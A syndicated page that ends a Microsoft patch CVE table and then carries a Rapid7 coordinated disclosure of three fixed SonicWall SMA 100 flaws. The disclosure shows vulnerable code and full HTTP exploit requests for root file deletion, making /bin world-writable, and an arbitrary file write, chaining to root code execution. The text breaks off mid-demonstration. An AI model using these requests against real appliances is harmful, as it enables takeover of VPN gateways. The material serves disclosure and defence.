CVE-2025-4050	Chromium: CVE-2025-4050 Out of bounds memory access in DevTools	No	No	N/A

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29813	Azure DevOps Server Elevation of Privilege Vulnerability	No	No	10
CVE-2025-26646	.NET, Visual Studio, and Build Tools for Visual Studio Spoofing Vulnerability	No	No	8
CVE-2025-32702	Visual Studio Remote Code Execution Vulnerability	No	Yes	7.8
CVE-2025-21264	Visual Studio Code Security Feature Bypass Vulnerability	No	No	7.1
CVE-2025-32703	Visual Studio Information Disclosure Vulnerability	No	No	5.5

ESU Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29962	Windows Media Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-29966	Remote Desktop Client Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-29967	Remote Desktop Client Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-32701	Windows Common Log File System Driver Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-32706	Windows Common Log File System Driver Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-30385	Windows Common Log File System Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-32709	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-32707	NTFS Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24063	Kernel Streaming Service Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-29831	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-30397	Scripting Engine Memory Corruption Vulnerability	Yes	No	7.5
CVE-2025-29969	MS-EVEN RPC Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-29833	Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability	No	No	7.1
CVE-2025-27468	Windows Kernel-Mode Driver Elevation of Privilege Vulnerability	No	No	7
CVE-2025-29959	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29960	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29830	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29832	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29836	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29958	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29961	Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29835	Windows Remote Access Connection Manager Information Disclosure Vulnerability	No	No	6.5
CVE-2025-29968	Active Directory Certificate Services (AD CS) Denial of Service Vulnerability	No	No	6.5
CVE-2025-29957	Windows Deployment Services Denial of Service Vulnerability	No	No	6.2
CVE-2025-30394	Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability	No	No	5.9
CVE-2025-29954	Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability	No	No	5.9
CVE-2025-29974	Windows Kernel Information Disclosure Vulnerability	No	No	5.7
CVE-2025-29837	Windows Installer Information Disclosure Vulnerability	No	No	5.5
CVE-2025-29956	Windows SMB Information Disclosure Vulnerability	No	No	5.4
CVE-2025-29839	Windows Multiple UNC Provider Driver Information Disclosure Vulnerability	No	No	4

Microsoft Dynamics vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-47732	Microsoft Dataverse Remote Code Execution Vulnerability	No	No	8.7
CVE-2025-29826	Microsoft Dataverse Elevation of Privilege Vulnerability	No	No	7.3

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-30377	Microsoft Office Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-30386	Microsoft Office Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-32704	Microsoft Excel Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-30382	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29976	Microsoft SharePoint Server Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-29978	Microsoft PowerPoint Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-32705	Microsoft Outlook Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29977	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29979	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-30375	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-30376	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-30379	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-30381	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-30383	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-30393	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-30384	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	7.4
CVE-2025-30378	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	7

Microsoft Office ESU Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-30388	Windows Graphics Component Remote Code Execution Vulnerability	No	No	7.8

System Center vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-26684	Microsoft Defender Elevation of Privilege Vulnerability	No	No	6.7
CVE-2025-26685	Microsoft Defender for Identity Spoofing Vulnerability	No	Yes	6.5

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29964	Windows Media Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-29840	Windows Media Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-29963	Windows Media Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-30400	Microsoft DWM Core Library Elevation of Privilege Vulnerability	Yes	No	7.8
CVE-2025-29970	Microsoft Brokering File System Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-26677	Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability	No	No	7.5
CVE-2025-29971	Web Threat Defense (WTD.sys) Denial of Service Vulnerability	No	No	7.5
CVE-2025-29842	UrlMon Security Feature Bypass Vulnerability	No	No	7.5
CVE-2025-29838	Windows ExecutionContext Driver Elevation of Privilege Vulnerability	No	No	7.4
CVE-2025-29841	Universal Print Management Service Elevation of Privilege Vulnerability	No	No	7
CVE-2025-29955	Windows Hyper-V Denial of Service Vulnerability	No	No	6.2
CVE-2025-29829	Windows Trusted Runtime Interface Driver Information Disclosure Vulnerability	No	No	5.5

Multiple vulnerabilities in SonicWall SMA 100 series (FIXED)

2025-05-07 Ryan Emmons

Post Syndicated from Ryan Emmons original https://blog.rapid7.com/2025/05/07/multiple-vulnerabilities-in-sonicwall-sma-100-series-2025/

Overview

Multiple vulnerabilities in SonicWall SMA 100 series (FIXED)

In April of 2025, Rapid7 discovered and disclosed three new vulnerabilities affecting SonicWall Secure Mobile Access (“SMA”) 100 series appliances (SMA 200, 210, 400, 410, 500v). These vulnerabilities are tracked as CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821. An attacker with access to an SMA SSLVPN user account can chain these vulnerabilities to make a sensitive system directory writable, elevate their privileges to SMA administrator, and write an executable file to a system directory. This chain results in root-level remote code execution. These vulnerabilities have been fixed in version 10.2.1.15-81sv.

Rapid7 would like to thank the SonicWall security team for quickly responding to our disclosure and going above and beyond over a holiday weekend to get a patch out.

Vulnerability table

CVE	Description	Affected Service	CVSS
CVE-2025-32819	An authenticated attacker with user privileges can delete any file on the SMA appliance as root to perform privilege escalation to the administrator account. Based on known (private) IOCs and Rapid7 incident response investigations, we believe this vulnerability may have been used in the wild.	HTTP (Port 80), HTTPS (Port 443)	8.8 (High)
CVE-2025-32820	An authenticated attacker with user privileges can inject a path traversal sequence to make any directory on the SMA appliance writable by all users, including the `nobody` user. Any existing file on the system can also be overwritten with junk contents as root.	HTTP (Port 80), HTTPS (Port 443)	8.3 (High)
CVE-2025-32821	An authenticated attacker with administrator privileges can inject shell command arguments to upload a fully controlled file anywhere that the `nobody` user can write to.	HTTP (Port 80), HTTPS (Port 443)	6.7 (Medium)

Credit

These vulnerabilities were discovered by Ryan Emmons, Staff Security Researcher at Rapid7, and are being disclosed in accordance with Rapid7’s coordinated vulnerability disclosure policy.

Remediation

To remediate CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821, SonicWall SMA administrators should update to the latest version, 10.2.1.15-81sv. For additional information, please see SonicWall’s advisory.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821 with an unauthenticated vulnerability check expected to be available in today’s (May 7) content release.

Analysis

The appliance tested was ”SMA 500v for ESXi” running version 10.2.1.14-75sv, the latest available at the time of research.

Multiple vulnerabilities in SonicWall SMA 100 series (FIXED)

CVE-2025-32819

An attacker with access to a low-privilege SMA user account can delete any file as root. This vulnerability appears to be a patch bypass for a previously reported arbitrary file delete vulnerability. That original vulnerability was disclosed by NCC Group in 2021, and a patch was previously released in the 10.2.0.9-41sv and 10.2.1.3-27sv patch cycle. Rapid7 is not aware of any specific CVE assigned to this original vulnerability; the NCC Group blog post states that a CVE was not shared with them, and we didn’t see a clear 1:1 match on the SonicWall PSIRT page.

Based on our testing, the unauthenticated arbitrary file delete vulnerability disclosed by NCC Group was patched by adding an authentication check. However, that authentication check is satisfied with a valid low-privilege session cookie, so exploitation is still viable. An attacker can exploit this vulnerability with low privileges to elevate to SMA administrator. This can be chained with CVE-2025-32820 and CVE-2025-32821 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. Note: Based on known (private) IOCs and Rapid7 incident response investigations, we believe this vulnerability may have been used in the wild.

In /usr/src/EasyAccess/www/conf/httpd.conf, we observe that the /fileshare/sonicfiles web path is mapped to the sonicfiles.py Flask application.

WSGIScriptAliasMatch ^/fileshare/sonicfiles /usr/src/EasyAccess/www/python/sonicfiles/sonicfiles.py
WSGIScriptAliasMatch ^/report    /usr/src/EasyAccess/www/python/sonicfiles/report.py
WSGIScriptAliasMatch ^/threat/__api__/v1 /usr/src/EasyAccess/www/python/authentication_api/threat_api.py

Within sonicfiles.py, we find the function main_handler, which is a main function that enforces authentication checks and dispatches various “RacNumber” SMB operations. At [A], we see an authorization check being performed before the primary API functionality is reachable.

@application.route('/sonicfiles', methods=['GET', 'POST']) 
@application.route('/', methods=['GET', 'POST'])
def main_handler():

    #Get the required config if its not set
    #application.get_config()
    prog = 'fileexplorer'

    '''Alternate method for CSRF

    referrer = request.referrer
    parsed_referrer = urlparse(request.referrer)
    if((referrer is None) or (parsed_referrer.hostname != request.host)):
        print("Referrer something is wrong")
        return HttpErrorCode["NOT_PERMITTED_AUTH"]
    '''

    #set the log level to Debug when don't get the setting from SMA settings.
    application.set_log_level(logging.DEBUG)

    authResult = application.authorizationCheck() # [A]
    if authResult:
        response = make_response(str(HttpErrorCode["NOT_PERMITTED_AUTH"][0])) 
        response.headers['content-type'] = 'text/plain'
        response.headers['Cache-Control'] = 'no-cache'
        logger.info("::SONICFILES:: Authorization check failed {}".format(authResult))
        return response, HttpErrorCode["NOT_PERMITTED_AUTH"][1]

    racNum = request.args.get('RacNumber', RacNumber.RAC_INVALID, int)
    if racNum is RacNumber.RAC_INVALID:
        return 'Invalid invocation', 500 

    smbshare = FileShare(application)
[..SNIP..]

Let’s investigate what application.authorizationCheck is. It’s defined in pythonApi.py:

 def authorizationCheck(self):
        return self.api.authorizationCheck(self.get_connection_id(), request.method, request.args.get('swcctn'))

The self.get_connection_id function is depicted below. It fetches the swap cookie ([B]), which is the primary session cookie, then decodes it as base64 ([C]) and returns it.

  @staticmethod
    def get_connection_id():
        if (SONICFILES_UNIT_TEST_MODE):
            #connection = request.args.get('sessionid', "", string)
            sessionid = request.args.get('sessionid')
            connection = base64.b64decode(sessionid).decode('utf-8')
            print(connection)
            return connection

        swap = request.cookies.get("swap") # [B]
        if swap == None:
            return ""

        connection = base64.b64decode(swap).decode('utf-8') # [C]
        mask_connection = connection.replace(connection[4:-4], (len(connection)-8) * '*') # abcd***...***ABCD
        logger.debug("::SONICFILES:: session {}".format(mask_connection))
        return connection

Since the primary authorizationCheck function is a SWIG function implemented in native code, the decompiled cleaned up C for that is depicted below. It calls sessionGetAndRefresh ([D]), which queries the web application’s SQLite primary database on disk, to determine whether the provided session is an authenticated one. If it’s valid (and if the CSRF token matches when the ‘POST’ method is used), it returns a success code ([E]).

0001b2e0    int32_t authorizationCheck(int32_t sessionId, char* method, int32_t swcctn)

0001b2e0    {
0001b2e0        int32_t currentSessionId = sessionId;
0001b315        int32_t sessionHandle = sessionGetAndRefresh(dbhGet(0), currentSessionId); // [D]
0001b31a        bool match = !sessionHandle;
0001b31a        
0001b31e        if (!sessionHandle)
0001b37b            return -1;
0001b37b        
0001b320        char* methodPointer = method;
0001b324        int32_t compareChars = 5;
0001b329        char const* const compareStr = "POST";
0001b329        
0001b32f        while (compareChars)
0001b32f        {
0001b32f            char mChar = *(uint8_t*)methodPointer;
0001b32f            char const compareChar = *(uint8_t*)compareStr;
0001b32f            match = mChar == compareChar;
0001b32f            methodPointer = &methodPointer[1];
0001b32f            compareStr = &compareStr[1];
0001b32f            compareChars -= 1;
0001b32f            
0001b32f            if (mChar != compareChar)
0001b32f                break;
0001b32f        }
0001b32f        
0001b331        if (match)
0001b331        {
0001b35f            currentSessionId = swcctn;
0001b35f            
0001b36a            if (doCSRFCheckForCgi(sessionHandle, currentSessionId))
0001b36a            {
0001b36f                sessionFree(sessionHandle);
0001b374                return -2;
0001b36a            }
0001b331        }
0001b331        
0001b336        sessionFree(sessionHandle, currentSessionId);
0001b33b        return 0; // [E]
0001b2e0    }

That establishes that any low-privileged user can call RacNumber functions via the sonicfiles API. In 2021, NCC Group outlined how the RAC_DOWNLOAD_TAR function (RacNumber=44) could be exploited with a path traversal for privileged arbitrary file deletion. That download_tar code does not appear to have been modified from what the NCC Group blog post shows, since the “/tmp” directory string is still unsafely concatenated with tainted web parameters ([F]); only the authentication check outlined above in main_handler appears to have been implemented as a fix.

  def download_tar(self, partialCmd):
        arg1 = self.get_decoded_url('Arg1')
        foldername = request.args.get('Arg2')
        timestamp = request.args.get('timestamp')
        list_file_path = None
            
        cmd_list = partialCmd.split()
        cmd_list.append(arg1)
        cmd_list.append(foldername)
        cmd_list.append("stdout")
        #appending verbose

        logger.debug("{} download_tar:: cmd_list: {}, timestamp {}".format(SONICFILES, cmd_list, timestamp))

        if timestamp is not None:
            swcctn = request.args.get('swcctn')
            list_file_path = '/tmp/' + swcctn + '_' + timestamp # [F]
            cmd_list.append(list_file_path)

        self.get_cred(cmd_list,arg1)#Appends cred to the list
        current_time = datetime.datetime.now().time()
        logger.debug("{} Download Start time : {}".format(SONICFILES, current_time.isoformat()))
		
        cmd_bytes_list = str_list_to_uft8_bytes_list(cmd_list)
        downloadsubprocess = subprocess.Popen(cmd_bytes_list,stdout=subprocess.PIPE,shell=False)
[..SNIP..]

Exploitation

We’ll start by creating a user named lowpriv with low user-level SMA privileges. This user account should not have access to any administrative functionality, and it will act as our victim account for exploitation. We’ll login to the SMA web service listening on port 443 and establish that we have access to this standard user account.

We’ll create two attacker-owned files as root to demonstrate the privileged arbitrary file delete.

Next, we’ll grab our lowpriv user’s session cookies and use them to perform the malicious file delete web request. The server will return a generic 500 code error response.

GET /fileshare/sonicfiles/?User=admin&Pass=null&Domn=&RacNumber=44&Arg1=smb://192.168.200.1/test/&Arg2=null&swcctn=../usr/src/EasyAccess/www/python/authentication&timestamp=api/../../../../../../tmp/rootfile HTTP/1.1
Host: 192.168.181.150
Cookie: swap="MHo5dTZvQkNRcXhVWDVpMFo1MktCRGZmYkZjSE9CZm1FUU9QOWdUek5BZz0="; swcctn=JKUKl0KiKYX5Kf4nY7700B4lb5N7M1PD
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

With our console root shell, we can see that the root-owned /tmp/rootfile file has been deleted.

This can be leveraged to delete the /etc/EasyAccess/var/conf/persist.db file, which is the primary web server SQLite database. When that happens, the system will reboot and reset the SMA administrator password to “password”. Based on known (private) IOCs and Rapid7 incident response investigations, we believe that this specific technique may have been used in the wild.

CVE-2025-32820

An authenticated attacker with user-level low privileges can inject a path traversal sequence to an arbitrary directory on the SMA appliance to make it world-writable. This can be chained with CVE-2025-32819 and CVE-2025-32821 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. Additionally, if a file path is provided, any existing file on the system can be overwritten with junk contents as root, creating a persistent denial of service condition.

Let’s investigate this now. In authentication_api/client/__init__.py, we observe authentication checks implemented in before_request ([G]).

@application.before_request
def before_request():
    logLevl = Logger.getLogLevel()
    application.logger.setLevel(logLevl)
    current_app.logger.info("{} {}".format(request.method, request.script_root + request.path))
    Authorize.authorization_check(request, current_app.logger, False) # [G]

This authorization_check function is similar to the one we previously looked at. However, this function is implemented in Python, within smaauthorize.py, instead of in a C shared library. Below, we can see this logic. The third parameter is called requireAdmin, and it defaults to True ([H]). In this case, though, the call within before_request explicitly states that low-privilege users should be allowed via the False parameter input. The authorization code queries the primary web SQLite database to determine whether the user’s swap session cookie exists in the database ([I]). If so, the request will succeed.

  @staticmethod
    def authorization_check(request, logger, requireAdmin = True): # [H]
        if (API_UNIT_TEST_MODE):
            return

        sessionId = request.cookies.get(AP_COOKIE_NAME)

        if (sessionId == None):
            logger.info("Login failed. No valid sessionId from cookie.")
            raise Unauthorized(AUTHORIZE_FAIL)

        temp_db_session = Session()
        sessionId_decoded = base64.b64decode(sessionId).decode()
        sslvpn_session = temp_db_session.query(SmaSession).filter(SmaSession.sessionId == sessionId_decoded).first() # [I]
        if (sslvpn_session == None):
            temp_db_session.close()
            logger.info("Login failed. No valid session. sessionId = {}, sessionId_decoded = {}".format(sessionId, sessionId_decoded))
            raise Unauthorized(AUTHORIZE_FAIL)

        # touch session
        sslvpn_session.activityTimestamp = int(time.time())
        temp_db_session.commit()
        temp_db_session.refresh(sslvpn_session)
        temp_db_session.close()

        # authorization check
        Authorize.sessionStatusCheck(logger, sslvpn_session)
        Authorize.userTypeCheck(logger, requireAdmin, sslvpn_session)
        Authorize.CSRFTokenCheck(logger, requireAdmin, sslvpn_session)

There are a few different API endpoints that can be reached as our low-privilege user. That list is depicted below:

clientApi.add_resource(NxDisconnectInfoResource, '/nxdisconnectinformation')
clientApi.add_resource(NxPostConnectionScriptResource, '/nxpostconnectionscript')
clientApi.add_resource(NxPostConnectionScriptFileResource, '/nxpostconnectionscript/file')
clientApi.add_resource(NxVersionResource, '/nxversion')
clientApi.add_resource(VpnParametersResource, '/vpnparameters')
clientApi.add_resource(SessionStatusResource, '/sessionstatus')
clientApi.add_resource(AlwaysOnResource, '/alwayson')
clientApi.add_resource(RecurringEpcProfileResource, '/recurringepcprofile')
clientApi.add_resource(BookmarkDetailListResource, '/bookmarkdetails')
clientApi.add_resource(ConnectionProxyResource, '/connectionproxy')
clientApi.add_resource(AdLogonScriptResource, '/adlogonscript')

The NxPostConnectionScriptFileResource endpoint sounds promising, since it deals with file operations. Within nxpostconnectionscript.py, we find the API endpoint logic for POST requests. A file input parameter called upfile is expected ([J]). A sanitized file name is extracted using secure_filename (to prevent path traversal) and assigned to the tmp_file variable ([K]). Then, the file contents are stored in tmp_file’s location. A file operation command is also executed using os.system, with the tmp_file argument sanitized using shlex.quote to prevent command injection ([L]).

This is all handled well. However, while the tmp_file path was created safely, the application later needs to reference just the file name without the prepended /tmp directory. In order to do so, it defines a new filePath variable by directly concatenating the unsanitized file.filename string with a different directory path ([M]). This is then wrapped in shlex.quote, appended to the string “chmod 777 ”, and executed using os.system ([N]). No command injection is possible, since the command string is appropriately escaped. Despite this, shlex.quote does not remove path traversal sequences, so a relative traversal file name can be supplied by the attacker to execute “chmod 777” as root on any path of the attacker’s choosing.

   @swagger.doc(postDocument)
    def post(self):
        post_reqparser = reqparse.RequestParser()
        post_reqparser.add_argument('upfile', required = True, type = FileStorage, location = 'files') # [J]
        args = post_reqparser.parse_args()

        [..SNIP..]

        # store file in /tmp for examination
        file = request.files['upfile']
        tmp_file = '/tmp/' + secure_filename(file.filename) # [K]
        file.save(tmp_file)

        fileSize = os.stat(tmp_file).st_size
        if (fileSize > smaApi.MAX_SCRIPT_FILE_LEN or fileSize == 0):
            cmd = "rm -rf {}".format(shlex.quote(tmp_file)) # [L]
            os.system(cmd)
            raise BadRequest(getMessage(API_ERR_CODE_CLIENT_FILE_SIZE_INVALID).format(int(smaApi.MAX_SCRIPT_FILE_LEN / 1024)))

        # check dir exists or not and if not create it
        if (not os.path.exists(smaApi.POST_SCRIPTS_DIR)):
            cmd = "mkdir {}; chmod 777 {}".format(shlex.quote(smaApi.POST_SCRIPTS_DIR), shlex.quote(smaApi.POST_SCRIPTS_DIR))
            os.system(cmd)
        
        if (not os.path.exists(smaApi.POST_SCRIPTS_DESC_DIR)):
            cmd = "mkdir {}; chmod 777 {}".format(shlex.quote(smaApi.POST_SCRIPTS_DESC_DIR), shlex.quote(smaApi.POST_SCRIPTS_DESC_DIR))
            os.system(cmd)

        # move file to its destination
        cmd = "mv {} {}".format(shlex.quote(tmp_file), shlex.quote(smaApi.POST_SCRIPTS_DIR))
        os.system(cmd)
        filePath = smaApi.POST_SCRIPTS_DIR + '/' + file.filename # [M]
        cmd = "chmod 777 {}".format(shlex.quote(filePath)) # [N]
        os.system(cmd)
[..SNIP..]

Exploitation

This is a niche primitive, since we do not control the command being executed. Fortunately, making any directory world-writable is exactly what we need to weaponize CVE-2025-32821, our arbitrary low-privilege file write as nobody. We’ll perform a web request to the vulnerable API endpoint as the lowpriv user. In that request, we’ll set upfile to a relative traversal sequence into /bin, which is on the root user’s PATH.

POST /__api__/v1/client/nxpostconnectionscript/file HTTP/1.1
Host: 192.168.181.150
Cookie: swap="MUZTMTExT29UVW1UZ0p2aURTQThWYzlLTmV3TEp3dGR5a0FzR3h6aEY2RT0="; swcctn=kg02nQOWI0JEdgI9OyK4i2EJyvP0Zfy0
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIpPybfdplJ1hIwzq
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 213

------WebKitFormBoundaryIpPybfdplJ1hIwzq
Content-Disposition: form-data; name="upfile"; filename="../../../../../../../../../bin/"

01
------WebKitFormBoundaryIpPybfdplJ1hIwzq--

Our pspy monitor logs two commands being executed as root. The first command’s file path is sanitized using secure_filename, but the second is only sanitized using shlex.quote, resulting in a traversal to /bin.

CMD: UID=0     PID=15082  | sh -c mv /tmp/bin /usr/src/EasyAccess/var/conf/postscripts
CMD: UID=0     PID=15083  | sh -c chmod 777 /usr/src/EasyAccess/var/conf/postscripts/../../../../../../../../../bin/

Exploitation is confirmed with our console root shell, which shows that the /bin directory is now world-writable.

CVE-2025-32821

An authenticated attacker with administrator privileges can inject shell command arguments with an escape sequence to upload a fully controlled file anywhere that the nobody user can write to. This can be chained with CVE-2025-32820 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. It’s also possible to copy existing files that the nobody user can read, such as /etc/passwd or the application’s SQLite database, to the web root directory for data exfiltration.

We’ll start by taking a look at the main function in /cgi-bin/importlogo.

After confirming the user is an authenticated administrator and the HTTP method is “POST”, the application checks for the presence of an integer parameter called updateFavicon ([O]). If this is set to “1”, and if the defaultFavicon parameter is “0”, the application will call FUN_0804a0f0 with the first argument set to a FILE pointer from the multipart form file parameter called favicon1 ([P]). After confirming some basic validation checks, such as file size, the FUN_0804a0f0 function will write the uploaded file to disk at /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico. Next, the portalName POST parameter is fetched and passed through safeSystemCmdArg2 ([Q]). This is a security function that searches for command injection characters, such as $, \n, ;, |, <, >, ^, and `. If any of those characters are detected, the function will return a truncated string of the characters up to that point. Then, a format string is created with the sanitized portalName value to craft the shell command string cp -f /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico /usr/src/EasyAccess/uiaddon/{portalName_VALUE}/favicon.ico ([R]) and the command is executed via system_s_quiet ([S]), which is a wrapper for system that runs in the context of nobody.

[..SNIP..]
  if (initCgi() < 0) {
    return -1;
  }

  getCookie("swap",cookieBuffer);

  initClientApi();
  cspInit();

  reqMethod = (char *)gcgiFetchEnvVar(4);
  uVar9 = dbhGet(0);

  sessionHandle = sessionGetAndRefresh(uVar9,cookieBuffer);

  if (sessionHandle == 0) {
    gcgiSendStatus(401);
    return 0;
  }
  respJson = cJSON_CreateObject();
  messageJsonArray = cJSON_CreateArray();

  if ((respJson == 0) || (messageJsonArray = 0)) {
    return 0;
  }

  maybeResult = userRolePermissionCheck(sessionHandle,reqMethod);
  if (maybeResult == 1) {
    pcVar5 = "You have no permission to view this page";

LAB_0804948a:
    addWarningMessage(messageJsonArray,"error",pcVar5);
  }
  else {
    if (maybeResult == 2) {
      pcVar5 = "Read-only administrator";
      goto LAB_0804948a;
    }

    if (maybeResult == 0) {
      maybeResult = strcmp(reqMethod,"POST");

      if (maybeResult != 0) goto LAB_080493e8;

      if (doCSRFTokenCheck(sessionHandle) != 1) {
        exit(-1);
      }

      setuid(0);
      setgid(0);
      seteuid(0);
      setegid(0);
      
      gcgiFetchInteger("updateFavicon",&updateFaviconFlag,0);
      
      if (updateFaviconFlag == 1) { // [O]
        maybeResult = gcgiFetchInteger("defaultFavicon",&useDefaultFavicon,0);
        bVar1 = nullptr;

        if (useDefaultFavicon == 0) {
          maybeResult = FUN_0804a0f0("favicon1","favicon1.ico",maybeResult); // [P]
          bVar1 = 0 < maybeResult;
        }

        maybeResult = gcgiFetchString("portalName",portalNameBuffer,0x80);

        if (maybeResult == 0) {
          if (useDefaultFavicon == 0) { 
            if (bVar1) {
              uVar9 = safeSystemCmdArg2(portalNameBuffer,"-"); // [Q]
              baseInstallDir = "/usr/src/EasyAccess";
              __snprintf_chk(pcVar5,0x180,1,0x180,
                             "cp -f %s/www/htdocs/themes/favicon1.ico %s/uiaddon/%s/favicon.ico",
                           "/usr/src/EasyAccess","/usr/src/EasyAccess",uVar9,"/usr/src/EasyAccess"
                            ); // [R]
              system_s_quiet(pcVar5); // [S]
[..SNIP..]

Note that the provided portal name is not validated as a legitimate web portal name at any point in the code path thus far–it’s checked against valid portal names if updateFavicon is not set. So, we don’t need to provide a valid portal name. Additionally, although the portal name is sanitized for command injection characters, it is not sanitized for path traversals, it is not URL encoded, and hash symbols are not truncated. As a result, an attacker can provide a portalName value with a traversal sequence to a different file path, followed by a space and a hash symbol to escape “/favicon.ico”.

The result is that the attacker can upload their own fully controlled file and exploit the limited command injection to write it with any file name they’d like to any directory that nobody can write to.

Exploitation

We can perform the web request depicted below to exploit this arbitrary file write.

POST /cgi-bin/importlogo HTTP/1.1
Host: 192.168.181.150
Cookie: ajaxUpdates=OFF; swap="NVlSSVc1MVdtb0syYWFybFdUdHFEcG9hRjZpMWlyaThlY0FmdlNQRlRhOD0="; swcctn=aXJANYBXJMy46YLSIApSwSoRIWkYRkR5
Content-Length: 554
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: aXJANYBXJMy46YLSIApSwSoRIWkYRkR5
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXOj6BtGNhEubdWvN
Origin: https://192.168.181.152
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.181.152/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="portalName"

../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="defaultFavicon"

0
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="updateFavicon"

1
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="favicon1"; filename="TESTING.gif"
Content-Type: image/gif

CONTENT
------WebKitFormBoundaryXOj6BtGNhEubdWvN--

Our pspy monitor logs the following command being executed as UID 99 (nobody).

